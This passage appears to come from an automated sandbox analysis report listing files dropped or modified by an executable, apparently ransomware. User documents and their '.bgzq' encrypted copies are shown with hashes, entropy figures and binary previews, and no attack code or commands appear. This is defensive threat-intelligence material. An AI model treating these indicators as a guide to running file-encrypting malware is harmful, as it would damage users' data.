                                                                                                MD5:B3E057EE20E25115A1D36B9A373680CD
                                                                                                SHA1:5329FFB8B719E8CAB87CB9A891D565C1080D939F
                                                                                                SHA-256:66BF9254826BD0F51077ABC698855B7FE5A46CBE7C44580AF7C94F6248F476E5
                                                                                                SHA-512:EC587C7E4052536E6DC9D343F60203EDD756A4C0CC5C4D8CEE70C74A12F8C0130FBDA14217F46E6D04952B0AD49A27A177DF69DB1241116502B7785D443CB040
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..a.Z>..(q....X.TBJ..3:.~.*..N.q..H.....rp.\.*/..m....v.Z.}I.>..Z......7......B....y.....@Zt....zD.....+../_..}......c...t>V....w.-Z..y.}.)L...~.r....f...ta.9Oc..sv.\.J.U.R........U..s.N.4.FE....;?O....y.Wn.%....Bx.c-...x._^...)Af(..7`C.b..>S2.W.-........(...DD?Y..~R....t0..w .$.h..Q..(+.(...9X..$.WI0B^u....q....W..=_......g.h.pW.........um .../m.;..2..Z...'.+.Y.}..g3Uog.........!.....~...V.......I.#.v9...2wr..wr.P..LaO.>`$.x....Eoz..C*\.fO................F)..A".x.),...]%.9..6$@)...Z.@*.X}......C."x.......@...A..6..1v..y.y.........V........ JKp.Y.UW6..f.%..6..2..Z%..e.......8......Ggx..D.ZZh.@#j.+V.~..7....Lo..{v*...*J;..xz....(.....f*.O....:z......c.t..Z.l...3..X.e2...h..Y..-.?%.~...............+.RVa..........C.Q....%..<."........yO..y[.1[.._..yr...(.GJ.......^..?;z[.^H.b..S..c}..7G.O....d......-.<s.x.....?3AW.....#a..e....^lk.o.Mi.Qr..I.}0.`RQ.a.)....$;%RV..o4./...y.....AxE..*...........j.)|.M|..~.p.:.(.Bl..{S.#i..7?...l1...cW.....4..H.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8616922564584
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ns2om5YOTEtpz0Qy9PMee+C4DQfwVVL4iayJTGxSiXPHQLDOX8PLnpGavpr8unZ0:G27iOgdy5MXv4sfY4iayJTG3PHQ2MDng
                                                                                                MD5:BB31B62586934BC6F2E451974CB76721
                                                                                                SHA1:513DC67FD750E2EBF1F29F69A4BA0A6E9B366CB1
                                                                                                SHA-256:0F2F4C084DC47F9D606D54AEB29DA2AE4BA713FFCAB76BEB2A7012D722F1E520
                                                                                                SHA-512:C90766970C111B238EFA4BD2C9B6CDE4CDF8C07CE4DB582774378F98D433A442B9CEC5938FDE754DC93A6A2BCB923DE754EE13E4FDDBCC08EFE2468A4178F11E
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..A.....]..sY.q...F..G.B..%z..+.....{...$....KU..j.&17.4..}nI.....(.k....D......L....`L:...).G.....$..(Z.R..\.u...r.].^z...?../...>.0....F..s..o9....z....k_CG..t8....Iz..l\..<I.....|".#...l.`>...f..<.n.9^..Uk....._e,s.t.P.&J....J<...c.`..>.v....he.,.%.Ot.R..p.]..2.li.1.y39h......ffB.(.=.Cc.}.:B.w>..-l.'..c~....r...D..oDZ&..qv..\4.......TN..y..S....r....=.fdC...*..(.."]...Z.{.F`W..u.V........+.r....x......o.~U.uo..].f.g,sR....xO[e.%.w^5..R....4..7.p..T....u..%...l.F.3S...z..L.._<..]`(.ZI..EPy*....&)..<%F..........z1=C....n..{D+.v.>..g........Ds.....y....s.....5.c...(.:KY....k_f\.1o7TV..SGB^ss9t&...v.Q.H.E./../..7. ...:..s.].p..J..q.`..$=.|22.M.\...y.M2>.........a.N.l..[bz.).X,j.5M...!<K...Z....S.@.5M[..).4.!..K..t.u..o"C.[....#.(..~.$:[........i>a(......^.(0_.^.7...N.X..~}.....BKh.H.2...-S....`...y..i[....i`...7.L....>.....E.e*f.bW..C.et.4..D..%+F..U......W. ..O.w)..'.&0E.e....0..'.u.<qK+.. lS.....Cey.T...h7...eC.........a;..]

                                                                                                C:\Users\user\Documents\EEGWXUHVUG.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8616922564584
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ns2om5YOTEtpz0Qy9PMee+C4DQfwVVL4iayJTGxSiXPHQLDOX8PLnpGavpr8unZ0:G27iOgdy5MXv4sfY4iayJTG3PHQ2MDng
                                                                                                MD5:BB31B62586934BC6F2E451974CB76721
                                                                                                SHA1:513DC67FD750E2EBF1F29F69A4BA0A6E9B366CB1
                                                                                                SHA-256:0F2F4C084DC47F9D606D54AEB29DA2AE4BA713FFCAB76BEB2A7012D722F1E520
                                                                                                SHA-512:C90766970C111B238EFA4BD2C9B6CDE4CDF8C07CE4DB582774378F98D433A442B9CEC5938FDE754DC93A6A2BCB923DE754EE13E4FDDBCC08EFE2468A4178F11E
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..A.....]..sY.q...F..G.B..%z..+.....{...$....KU..j.&17.4..}nI.....(.k....D......L....`L:...).G.....$..(Z.R..\.u...r.].^z...?../...>.0....F..s..o9....z....k_CG..t8....Iz..l\..<I.....|".#...l.`>...f..<.n.9^..Uk....._e,s.t.P.&J....J<...c.`..>.v....he.,.%.Ot.R..p.]..2.li.1.y39h......ffB.(.=.Cc.}.:B.w>..-l.'..c~....r...D..oDZ&..qv..\4.......TN..y..S....r....=.fdC...*..(.."]...Z.{.F`W..u.V........+.r....x......o.~U.uo..].f.g,sR....xO[e.%.w^5..R....4..7.p..T....u..%...l.F.3S...z..L.._<..]`(.ZI..EPy*....&)..<%F..........z1=C....n..{D+.v.>..g........Ds.....y....s.....5.c...(.:KY....k_f\.1o7TV..SGB^ss9t&...v.Q.H.E./../..7. ...:..s.].p..J..q.`..$=.|22.M.\...y.M2>.........a.N.l..[bz.).X,j.5M...!<K...Z....S.@.5M[..).4.!..K..t.u..o"C.[....#.(..~.$:[........i>a(......^.(0_.^.7...N.X..~}.....BKh.H.2...-S....`...y..i[....i`...7.L....>.....E.e*f.bW..C.et.4..D..%+F..U......W. ..O.w)..'.&0E.e....0..'.u.<qK+.. lS.....Cey.T...h7...eC.........a;..]

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\DUUDTUBZFW.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8400335417005
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:k8mDPp1rkPLHnpZRoy9HvJyXlvn5kKX9IZUb1FhvoGBabWhkK6Kq5pnrxpXfzIbD:k5PjkPLHbHvgNn5xi0aWkhhprx5fzSD
                                                                                                MD5:9B194DD25FB7C04771FB4CA7D5B6D7B1
                                                                                                SHA1:630B114AEA7F9C543A041D6BD931A93B977D1127
                                                                                                SHA-256:FE4CA7B167504E4D96719EFF4398BC9886615EE835C5E658D12952728E96F815
                                                                                                SHA-512:2A9222F8489B937E995B92E792BDF73CAC05AEA43EF0BBAA4FA947ADF445095D4FEB3A4072A14980C2B1B303A600FE6E1A6F09E33BA49FC0900216A17F95B2F9
                                                                                                Malicious:false
                                                                                                Preview:DUUDT.a.9.K.B.....41...L]/l$.@o..F.....mJn..L..L.Aq..........qd...3.]....|.a.z..".S...zn<>........n...yh.rE;.............I...].T..t......U.q.z.j....D.:<....8..R.......8.j...c.........N....C.:`/..i..+o.y.......b.....u...{B}....<r..0x..I..../.d.\..a..x..../.W....o.^E.ok5}(m...J.......r...gz..>x.D.m.....3.^.4A.p..?m....:.$...0......b.......sf..N.......D..''.7. ...$.s..5#..<...#..../......0..K~b..g.."/..Sui........u...gU.DIe..A........'..r.......I?.M...........).p.:.k....|.A....0.r}...E....k.yTJ..WMM@o.R.!).Z.b.+>........).,.^...^..lm...j..#3zP...*T..........oB...|.'..f.<.8".......J]..g...5.K6.]{0v.....|.... X.i.9..?nMX.'g....*.2......1.....>Qp...*7.B.....z.].X.......c.X...r...C..5......N......../. 9@..N.W2.... ?.|U].(..m..*.1[.K.-i.rJV.+7..t#.../..rw...j.....W.Z0Q.p^.t...ub..4"?...U...t...1....v.5.>....,.c.W`=..3r....i./....E.s....1Q(.p..O.7..N....}...6.2....<.lz..=...z.A+A.?4t..I..R.....:4E:1.....uI.l..,..}kR.P.[~.t{e....x..5

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\DUUDTUBZFW.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8400335417005
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:k8mDPp1rkPLHnpZRoy9HvJyXlvn5kKX9IZUb1FhvoGBabWhkK6Kq5pnrxpXfzIbD:k5PjkPLHbHvgNn5xi0aWkhhprx5fzSD
                                                                                                MD5:9B194DD25FB7C04771FB4CA7D5B6D7B1
                                                                                                SHA1:630B114AEA7F9C543A041D6BD931A93B977D1127
                                                                                                SHA-256:FE4CA7B167504E4D96719EFF4398BC9886615EE835C5E658D12952728E96F815
                                                                                                SHA-512:2A9222F8489B937E995B92E792BDF73CAC05AEA43EF0BBAA4FA947ADF445095D4FEB3A4072A14980C2B1B303A600FE6E1A6F09E33BA49FC0900216A17F95B2F9
                                                                                                Malicious:false
                                                                                                Preview:DUUDT.a.9.K.B.....41...L]/l$.@o..F.....mJn..L..L.Aq..........qd...3.]....|.a.z..".S...zn<>........n...yh.rE;.............I...].T..t......U.q.z.j....D.:<....8..R.......8.j...c.........N....C.:`/..i..+o.y.......b.....u...{B}....<r..0x..I..../.d.\..a..x..../.W....o.^E.ok5}(m...J.......r...gz..>x.D.m.....3.^.4A.p..?m....:.$...0......b.......sf..N.......D..''.7. ...$.s..5#..<...#..../......0..K~b..g.."/..Sui........u...gU.DIe..A........'..r.......I?.M...........).p.:.k....|.A....0.r}...E....k.yTJ..WMM@o.R.!).Z.b.+>........).,.^...^..lm...j..#3zP...*T..........oB...|.'..f.<.8".......J]..g...5.K6.]{0v.....|.... X.i.9..?nMX.'g....*.2......1.....>Qp...*7.B.....z.].X.......c.X...r...C..5......N......../. 9@..N.W2.... ?.|U].(..m..*.1[.K.-i.rJV.+7..t#.../..rw...j.....W.Z0Q.p^.t...ub..4"?...U...t...1....v.5.>....,.c.W`=..3r....i./....E.s....1Q(.p..O.7..N....}...6.2....<.lz..=...z.A+A.?4t..I..R.....:4E:1.....uI.l..,..}kR.P.[~.t{e....x..5

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.860236152814374
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ENQ87v2BILjTAuBztplpA8GAdx4KRPpxxyVikz7DmQVAK8d411UTpdBXfzIbD:EhOOj0uBzlmXA8YFSPaaAAbUTpdhfzSD
                                                                                                MD5:5B047FC4A74AC8D4A7825C8CCDF376EF
                                                                                                SHA1:8F376C2E5779DFE63E0F84FC1A8DE2E2F65BF86B
                                                                                                SHA-256:132570113E725585AA35CB97FE626528AC23A8C86B9E6ECF6663CF066DFA4D02
                                                                                                SHA-512:C6046087A1A098212B2A2E12FCB9AD8B367A096E97E1BC1F651368667FE5F3C2EA6F5AFD5642B2FE5ACD34D5C0A49A11166562DB36C759B09082B3E26C149ACB
                                                                                                Malicious:false
                                                                                                Preview:EEGWX........pl....f..;.mp.E..:.FJk6(...3 ...6...vO..c.z...6-q.fn%....9J.|'......D..66..N..z:..S.Q...:....4i.....d.:6.+..`..9.aj.n=,2..'....&cw@tNZ............\.-.....Vg@).$>-tz...f..k.\b.@f=.P..........Om.D.+.&!...I.oGl`..0...3..9.<..........c.....D...`.$A. ,K......)...".t.|..A<..#5.z?...B..dY......B.%......=...x5.G.."].8..Dy.9\Kc._.....7.s^....M.....z..'..tr.s.&+.:..u..?lp.#...18.(...d....qG].p..F..t.=.....Tg.....?...Zb. ....lrc...=.._.0y..T.B46....C...D....X........5...Ni..8Lh.9s.C.b5}.y.Z..j.....`.=F.TD.L.|n..Oe..3.".o...6..\9.U.......>.v.u.jx..P8Fy.u...~.......y.S..^.^.B....;..(+..P>...<......:;).Y#.^......Ro/..R0.r........ny....%...i....7.... ..7CM.....d+~P. _.A..._a.4...#J.R..S:ZP._.Q...s......D.P...m.W ..+....0...]8z.....=...7..Q..Z.......^...iH...+.,gs..t...g..^].........zK.........\mo1........r.v...R..M.!."..=}..c[S.,..Z...<..z$.M.._..cX.. t.BN.9.b<c...a..1...L..DF..&2.....QDl.+.B..=..:....[&U....XH.L.,....s..!& \..

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.860236152814374
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ENQ87v2BILjTAuBztplpA8GAdx4KRPpxxyVikz7DmQVAK8d411UTpdBXfzIbD:EhOOj0uBzlmXA8YFSPaaAAbUTpdhfzSD
                                                                                                MD5:5B047FC4A74AC8D4A7825C8CCDF376EF
                                                                                                SHA1:8F376C2E5779DFE63E0F84FC1A8DE2E2F65BF86B
                                                                                                SHA-256:132570113E725585AA35CB97FE626528AC23A8C86B9E6ECF6663CF066DFA4D02
                                                                                                SHA-512:C6046087A1A098212B2A2E12FCB9AD8B367A096E97E1BC1F651368667FE5F3C2EA6F5AFD5642B2FE5ACD34D5C0A49A11166562DB36C759B09082B3E26C149ACB
                                                                                                Malicious:false
                                                                                                Preview:EEGWX........pl....f..;.mp.E..:.FJk6(...3 ...6...vO..c.z...6-q.fn%....9J.|'......D..66..N..z:..S.Q...:....4i.....d.:6.+..`..9.aj.n=,2..'....&cw@tNZ............\.-.....Vg@).$>-tz...f..k.\b.@f=.P..........Om.D.+.&!...I.oGl`..0...3..9.<..........c.....D...`.$A. ,K......)...".t.|..A<..#5.z?...B..dY......B.%......=...x5.G.."].8..Dy.9\Kc._.....7.s^....M.....z..'..tr.s.&+.:..u..?lp.#...18.(...d....qG].p..F..t.=.....Tg.....?...Zb. ....lrc...=.._.0y..T.B46....C...D....X........5...Ni..8Lh.9s.C.b5}.y.Z..j.....`.=F.TD.L.|n..Oe..3.".o...6..\9.U.......>.v.u.jx..P8Fy.u...~.......y.S..^.^.B....;..(+..P>...<......:;).Y#.^......Ro/..R0.r........ny....%...i....7.... ..7CM.....d+~P. _.A..._a.4...#J.R..S:ZP._.Q...s......D.P...m.W ..+....0...]8z.....=...7..Q..Z.......^...iH...+.,gs..t...g..^].........zK.........\mo1........r.v...R..M.!."..=}..c[S.,..Z...<..z$.M.._..cX.. t.BN.9.b<c...a..1...L..DF..&2.....QDl.+.B..=..:....[&U....XH.L.,....s..!& \..

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\EIVQSAOTAQ.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.848032161474281
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Rr5wjVDcJIaGDzpRxsSQfHJJIqSdIsAcko84APVm2QU8LhbiROJIbaOwXfzIbD:8jVDcTGDz6SITITdIFcNIPl5ah2pYfz6
                                                                                                MD5:94FCF684D961D41B5F154642A0165046
                                                                                                SHA1:A0EF3B54AF9B6D9748112A909FB6831B2535CFDE
                                                                                                SHA-256:88F051BA06AECD935983567397F4B48EB50B069C6C3AC6FC1A78EC42CCB36117
                                                                                                SHA-512:A1B0EE5ED0CA6519DCCC152A3E1E5ACBF81BA03C235BA042C6B8CFF31CA6C3BC615C977A118C4545FA6D9FD3821630AA5F0573228603459ED3DB7445BDCBC8A2
                                                                                                Malicious:false
                                                                                                Preview:EIVQS..?wD...Q..x..H....<<p~..-J....xi1..b;..../..S]..{....,..}.e.Bh..2o....H........o...T.=...O6....L.+....}y...`..V.~.6.j.rr......M..d-@U'...G..).)8.hr.]s..:4x)...?.?.B....N........(JYC.3..V.iuT&7..]...i....86{@Wz.....F..]vL.3x..>.Lo92F.].K......;....J..j.=S.\.....=......F!8s..{......(.$.....j.......U.FR..n...S..y..:y.._.N.tN.b.......2M. ..t...-N%e.'. .,...o.=.X}+.fd@.S.R.,.....dp.M.j~...a.I....P;q..u.s...n..:v.;.<.`..D..ql......s.p5.,N.V..Bz4..p1.E..-..b.f.n...M."(....~.l.K.ij.....u.y....ai.l........v...n..s.e.I@......6.....C>.S....v...46.Z....+.*.../.ic...N..z..Rm../.u......,..kL&....BK.7.M.W.?..eLZ...Q8?yh3KNd.....Ff.+q...7..4.y........8|.E.....~.uI.G3Z....?[..I..t...B..u....=wb..r...wX-..p.vE.0Y...3^.J..f...;.DQX.2..Qb.6.N.r8`.N!R.Xp..4b,l.d.r....-........|(...|..[.7.n.....d..........'.=.J.....m.k._.c..$.7o........s,n......g.......1\..>r.kZ.=....Mz..T..F..\...4.........Ga......o....O.z.N..>m_..*..S .1X.>...sAV....0.!lp.F.t"G.L.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\EIVQSAOTAQ.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.848032161474281
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Rr5wjVDcJIaGDzpRxsSQfHJJIqSdIsAcko84APVm2QU8LhbiROJIbaOwXfzIbD:8jVDcTGDz6SITITdIFcNIPl5ah2pYfz6
                                                                                                MD5:94FCF684D961D41B5F154642A0165046
                                                                                                SHA1:A0EF3B54AF9B6D9748112A909FB6831B2535CFDE
                                                                                                SHA-256:88F051BA06AECD935983567397F4B48EB50B069C6C3AC6FC1A78EC42CCB36117
                                                                                                SHA-512:A1B0EE5ED0CA6519DCCC152A3E1E5ACBF81BA03C235BA042C6B8CFF31CA6C3BC615C977A118C4545FA6D9FD3821630AA5F0573228603459ED3DB7445BDCBC8A2
                                                                                                Malicious:false
                                                                                                Preview:EIVQS..?wD...Q..x..H....<<p~..-J....xi1..b;..../..S]..{....,..}.e.Bh..2o....H........o...T.=...O6....L.+....}y...`..V.~.6.j.rr......M..d-@U'...G..).)8.hr.]s..:4x)...?.?.B....N........(JYC.3..V.iuT&7..]...i....86{@Wz.....F..]vL.3x..>.Lo92F.].K......;....J..j.=S.\.....=......F!8s..{......(.$.....j.......U.FR..n...S..y..:y.._.N.tN.b.......2M. ..t...-N%e.'. .,...o.=.X}+.fd@.S.R.,.....dp.M.j~...a.I....P;q..u.s...n..:v.;.<.`..D..ql......s.p5.,N.V..Bz4..p1.E..-..b.f.n...M."(....~.l.K.ij.....u.y....ai.l........v...n..s.e.I@......6.....C>.S....v...46.Z....+.*.../.ic...N..z..Rm../.u......,..kL&....BK.7.M.W.?..eLZ...Q8?yh3KNd.....Ff.+q...7..4.y........8|.E.....~.uI.G3Z....?[..I..t...B..u....=wb..r...wX-..p.vE.0Y...3^.J..f...;.DQX.2..Qb.6.N.r8`.N!R.Xp..4b,l.d.r....-........|(...|..[.7.n.....d..........'.=.J.....m.k._.c..$.7o........s,n......g.......1\..>r.kZ.=....Mz..T..F..\...4.........Ga......o....O.z.N..>m_..*..S .1X.>...sAV....0.!lp.F.t"G.L.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\GRXZDKKVDB.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.850116234674392
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/ZlTFanJoMVqph/isbr+SUukfPM9e1xgmhIGXL+Vbo1gaJBF16jXfzIbD:/ZfaJoMYph/isbr+X3j1TXL+Vbo1gaPl
                                                                                                MD5:9E312DF1BD1C5C196DFB3F89E7F490D7
                                                                                                SHA1:883EB1C5BC3BDE8A5812188A93CAE42C58F3E3FD
                                                                                                SHA-256:60271F3BA3117364451904ABDF2C1829BF5CE8A3454DFAE6133D3E16368B910E
                                                                                                SHA-512:1844BF365E5F9633DA4A52391A54044B49DC5C605DD312C70BFB8EE4FDD7A7BD2EA0CAFDCA734F7546754CA15054E5CEE04A1FF994A99D1C34F18D1FF26FA357
                                                                                                Malicious:false
                                                                                                Preview:GRXZD`)c....^.waXK.lS......~..SU$.6...MZ6.....#.L.Z.&Ms.q.hNWd.!...K...1j..q...j.@B..........Nv... ...*....)I.a.....3.w..'~....Ae.!jx.!.7..#.e=s.x=C.6.........h.._...R..L|..]lt...g.....@..."N..$Ky.\..../..[.?...KTd.Z..A..T..._.."h.e.(...-.....^H..s.B.....6..t..g...A...Y....."........I.p=.........|.e...K8 ".9G=t...=.2s..O:.p."...7.......>...&..Q...0.4.m.M.B4So..r.g..Di0oyb...>X.Mp..@O.D+..H0.O6y.{.tV.......5.Dh.k...P.#.V+....e.cF.-8.....;......lO7u...M56..r.H=..X...R..]#..L...7.._....|...z....F....U.lg......W3-.f.%..dP.t..... %.fr*`.G.......9Uqv-T..w.AF..-......$....3.k....e.t.*?(.!?...5..?......E;^..`.N&%....kz.e.......0.+..zD/...7.wx.A.&_.W.^...{X3..?....o .p.k...*..;o5..7..$..p...C{.^D.....\2w...DQ...>.]...x.....N.H.i......PD^!...F.UT!z.....8..+.....L.EI....C....o^..qT)..)~...E`.hY...G.A.....[..I#..R..}.#.....].7....{$(.,..@..WoJ...\Rg....Q$...}...B.2.b....I.. Z.{.3..<..@.N;N..v.{<=.9.eK..%VM..a...N?.".#g.._.uWI....Z....`.G.u....C.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\GRXZDKKVDB.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.850116234674392
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/ZlTFanJoMVqph/isbr+SUukfPM9e1xgmhIGXL+Vbo1gaJBF16jXfzIbD:/ZfaJoMYph/isbr+X3j1TXL+Vbo1gaPl
                                                                                                MD5:9E312DF1BD1C5C196DFB3F89E7F490D7
                                                                                                SHA1:883EB1C5BC3BDE8A5812188A93CAE42C58F3E3FD
                                                                                                SHA-256:60271F3BA3117364451904ABDF2C1829BF5CE8A3454DFAE6133D3E16368B910E
                                                                                                SHA-512:1844BF365E5F9633DA4A52391A54044B49DC5C605DD312C70BFB8EE4FDD7A7BD2EA0CAFDCA734F7546754CA15054E5CEE04A1FF994A99D1C34F18D1FF26FA357
                                                                                                Malicious:false
                                                                                                Preview:GRXZD`)c....^.waXK.lS......~..SU$.6...MZ6.....#.L.Z.&Ms.q.hNWd.!...K...1j..q...j.@B..........Nv... ...*....)I.a.....3.w..'~....Ae.!jx.!.7..#.e=s.x=C.6.........h.._...R..L|..]lt...g.....@..."N..$Ky.\..../..[.?...KTd.Z..A..T..._.."h.e.(...-.....^H..s.B.....6..t..g...A...Y....."........I.p=.........|.e...K8 ".9G=t...=.2s..O:.p."...7.......>...&..Q...0.4.m.M.B4So..r.g..Di0oyb...>X.Mp..@O.D+..H0.O6y.{.tV.......5.Dh.k...P.#.V+....e.cF.-8.....;......lO7u...M56..r.H=..X...R..]#..L...7.._....|...z....F....U.lg......W3-.f.%..dP.t..... %.fr*`.G.......9Uqv-T..w.AF..-......$....3.k....e.t.*?(.!?...5..?......E;^..`.N&%....kz.e.......0.+..zD/...7.wx.A.&_.W.^...{X3..?....o .p.k...*..;o5..7..$..p...C{.^D.....\2w...DQ...>.]...x.....N.H.i......PD^!...F.UT!z.....8..+.....L.EI....C....o^..qT)..)~...E`.hY...G.A.....[..I#..R..}.#.....].7....{$(.,..@..WoJ...\Rg....Q$...}...B.2.b....I.. Z.{.3..<..@.N;N..v.{<=.9.eK..%VM..a...N?.".#g.._.uWI....Z....`.G.u....C.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\KLIZUSIQEN.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.872412417027278
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bYCpIkzeAWohnaIPmgpumqeNVQYNhAmitGuUlAT+Knw0bxWUHWwFwBXfzIbD:8iIkvWw5PmyOeNVQxjt0AT+LaIWFcfz6
                                                                                                MD5:CA07C2656C8F032D575A97FEC6AFDAF7
                                                                                                SHA1:8608E4D56ED5EB980E951B2E4A4A1FB92F856894
                                                                                                SHA-256:9105957631ED11A15EF9A8ED1DD048B2B01F1EF46F51171944E5145638377333
                                                                                                SHA-512:6FAF482EA0EBECA48F02319F5C15E6EB3E2E24839299B4CF330688A3C7B7C8971994C487186095159676274CFE99B55BDFA7EDD829014D8E8628146B63BB9CD4
                                                                                                Malicious:false
                                                                                                Preview:KLIZU..0uAP'......7.5.....g......8z..N...`O.....z.?^.v$..n"}....G.c]......C.....z%...::.nl9.-....m....[..\....?.....S...^.....Q.p.~'....g,.,X....oF....%.(.?.Z.A...T.8[......O.gArv..u..4.U.i...>_...v:).pb....`....d.B.......qMyYPR.4}Dv.UR".Y..V_.).|.g:.....>...%..x.j+}..5../...?....v..4..LK.D..........<DaDJ;..n.. .M.J....j&.=.8....g}...x....gI7....Df.u.k.k.[.i...... >...p.@Ycl.....%.@.D...jv.5.*..I.....V_....K4#..z....25.RF.(.].t Q~I.F.(8.N.."DC.e.N...Q........x.I.~G~.[n.C-/.Gr..cMNo..........:..Zh.)...a..[O..J3..6..!:.=vi.....&.p...$.RYF..Q....^.P.,Pj.....w....-.v.....3uq....APgz(z..j.HSa!s...<t!..XM..el>..[r.~'......N...\T.^K....".......a|Q.r...z.....M..~W...o.!g&y.@W...;...K.J......,..j.00..g.s{...9.......n.<CQ.H.....f...uXT}...!.w..7..].............%......8..w......../......~GoH0..$!I.u.y..q.{wZn|.#... n`.g..)"w........c...._l.k.;...@8n.%.......qv.....Y.uY....<43U.....+..O....W..P..@2..Luz....5B...1..0..n..P..b...8..E..,.@..........Qd.IjN.3.#..

                                                                                                C:\Users\user\Documents\EEGWXUHVUG\KLIZUSIQEN.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.872412417027278
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bYCpIkzeAWohnaIPmgpumqeNVQYNhAmitGuUlAT+Knw0bxWUHWwFwBXfzIbD:8iIkvWw5PmyOeNVQxjt0AT+LaIWFcfz6
                                                                                                MD5:CA07C2656C8F032D575A97FEC6AFDAF7
                                                                                                SHA1:8608E4D56ED5EB980E951B2E4A4A1FB92F856894
                                                                                                SHA-256:9105957631ED11A15EF9A8ED1DD048B2B01F1EF46F51171944E5145638377333
                                                                                                SHA-512:6FAF482EA0EBECA48F02319F5C15E6EB3E2E24839299B4CF330688A3C7B7C8971994C487186095159676274CFE99B55BDFA7EDD829014D8E8628146B63BB9CD4
                                                                                                Malicious:false
